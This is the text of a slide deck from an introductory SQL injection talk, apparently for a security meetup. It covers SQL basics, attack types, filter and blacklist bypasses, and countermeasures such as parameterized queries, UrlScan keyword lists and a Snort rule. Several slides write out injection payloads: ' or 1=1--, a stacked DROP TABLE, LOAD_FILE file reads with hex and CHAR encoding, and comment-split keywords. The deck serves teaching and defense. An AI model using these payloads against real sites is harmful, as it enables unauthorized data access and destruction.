SQL – Injections Intro.
12/08/21
Greg Bugaj, SCJP
ISSA
DC 405
Agenda
• Disclaimer
• What are SLQ Injection
• Into to SQL
• Attack Vectors
• Bypassing filters
• Demos
• Countermeasures
• Questions
2
Disclaimer
• All code shown today is for educational and research
purposes only
• In many countries it is illegal to use this type of attack
• Demonstrated Website owners have been notified of
the problem
3
SQL Injections
• SQL injection
– code injection technique that exploits a security
vulnerability in application
– occurs at the database layer of an application.
• SQL - Structured Query Language
– Used to communicate with the database
– ANSI-compliant SQL
4
SQL Injections
• Authentication Bypass
• Information Disclosure
• Compromised Data Integrity
• Compromised Availability of Data
• Remote Command Execution
5
Basic SQL
Select
Insert
Update
Delete
Union
• SQL statement breakdown
6
SQL - Select
1. Select Information from a table
SELECT * FROM table where field=1
7
SQL - Insert
1. Add new records to database
INSERT INTO tablename (id, name) values(10, “Greg”)
8
SQL - Update
1. Updating existing records
UPDATE table set fieldA=123 WHERE somefield=2323
UPDATE table set fieldB=‘Greg’
9
SQL - Delete
1. Delete records
DELETE FROM tableA where somefield=1221
DELETE FROM tableA
10
SQL - Union
1. Combine two or more SELECT statements.
SELECT column_name(s) FROM table_name1
UNION
SELECT column_name(s) FROM table_name2
11
Terminators
• ; Semi colon ends current SQL query and starts a new one
– SELECT * FROM users ; DROP TABLE users
• Stacked Query
• -- Double dash ignores remaining query string
– Select * FROM users -- limit 10
• Can be used in conjunction
– SELECT * FROM users WHERE id=''; DROP TABLE users; -- '
AND password=''
12
Where Clause Pruning
• Powerful SQL technique
– SQL trick for allowing a query to return either a full
set or a specified subset
– 1=1 == TRUE
• SELECT * FROM users
WHERE (id = :id) OR (-1 = :id))
13
SQL Injection Cause
• Executed via front end of the Web Application
– GET URL parameter
• http://host.com/item.php?cat=1&id=11
– Form POST fields
• <form action=“some.php” method=“post”>
<input name='name'/>
<input type='password' name='passwd'/>
</form>
14
Techniques
• Normal SQL Injections
– Errors & Exception
– Unexpected output
• O'Reilly != O\'Reilly
• Blind SQL Injections
– No errors
– A lot of guesswork
– Introduction of a delay as part of a malicious SQL statement
15
SQL Injection Types
• Passive
– Exposing database information
• Information retrieval
• Active
– Altering database information
• Insertion
• Deletion
16
Testing for Vulnerability
• Manual
– Time consuming
• Automated
– SQL injection scanners only scan for known
vulnerabilities
• Google
– Incorrect syntax near
17
Toolbox
• SQLIer
• SQLbftools
• SQLibf
• SQLBrute
• BobCat
• SQLMap
• Absinthe
• SQL Injection Pen-testing Tool
• SQID
• SQLNinja
• FJ-Injector Framwork
• Automagic SQL Injector
• NGSS SQL Injector
18
Identifying Vulnerable Site
Given unexpected input site behaves oddly
– ‘ Single Quote
– “ Double Quote
– ‘1 Single Quote one
– ‘a Single Quote a
– ‘; Single Quote semicolon
• Input > Satan’s little minion
– Nothing found for Satan\’s little minion
– You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
syntax to use near '\'
19
Identifying Vulnerable Site
• ' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
20
Bypassing Filters
• Escaping entities
– %26%23039 == ' == ‘ (single quote)
• %26 == &
• %23 == #
• 039 Entity number
– Select * FROM users WHERE username=‘secret%26%23039 OR %26%23039X
%26%23039=%26%23039X
– Evaluated as > Select * FROM users WHERE username=‘secret ‘ OR ‘X’ = ‘X’
• This evaluates to always true
• Char function
– Char(83,101,108,101,99,116,32,42,32,102,114,111,109,32,117,115,101,114,115)
– Select * from users
• Concat & Hex functions
– CONCAT('0x', HEX('/var/log/messages'))
– 0x2F7661722F6C6F672F6D65737361676573
21
Bypassing Filters
• Injecting AND 1=(SELECT
LOAD_FILE('var/log/messages') )
– MySQL Error '\'var/log/messages\') ) limit 5 = 1
order by average desc limit 10' at line 1)
22
Bypassing Filters
• 1=(SELECT LOAD_FILE('var/log/messages') )
– MySQL Error: 1064 (You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right
syntax to use near '\'var/log/messages\') ) limit 5 -- = 1 order by average
desc limit 10' at line 1)
• Char
• Hex
– 1=(SELECT
LOAD_FILE(0x2F7661722F6C6F672F6D65737361676573)
23
Bypassing Blacklists
• What are Blacklists
• Blacklist (DELETE, EXEC)
– DEL/**/ETE
– /**/ D/**EVIL**/ELE/**/TE
24
Escape Characters
• %26%23039 OR %26%23039X%26%23039=
%26%23039X
– ‘ OR ‘X’ = ‘X’
25
Demos
• Prerecorded demos
26
Countermeasures
• System Administrators
– White List / Blacklist Input Validation
– Least Privileges
– Application firewalls
• Developer
– Stored Procedures
– Parameterized queries
– Exception handling
27
Whitelist Input validation
• UrlScan v3.0
– restricts the types of HTTP requests that IIS will process
[SQL Injection Headers]
AppliesTo=.asp,.aspx
[SQL Injection Headers Strings]
--
@ ; also catches @@
alter
delete
drop
exec
insert
• SNORT
– Create rule to check for SQL attack
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"SQL Injection "; flow:to_server,established;
uricontent:".php | .aspx | .asp";
pcre:"/(\%27)|(\')|(\-\-)|(%23)|(#)/i";
classtype:Web-application-attack; sid :9099; rev:5;)
28
Least Privileges
• Enforce least privileges
– CREATE / DELETE
– Does not guarantee security
• Access to portion of data
– Create views
29
Application Firewalls
• Software
– Easy to install and maintain
• Hardware
– Expensive
– Plug and Play
• Examples:
– dotDefender
– webApp.SECURE
– SonicWALL
– WatchGuard
30
References
• http://www.owasp.org/index.php/OWASP_Testing_Guide_App
endix_C:_Fuzz_Vectors#Passive_SQL_Injection_.28SQP.29
• http://upload.wikimedia.org/wikipedia/en/a/aa/SQL_ANATOM
Y_wiki.svg
• http://www.cisco.com/web/about/security/intelligence/sql_injec
tion.html
31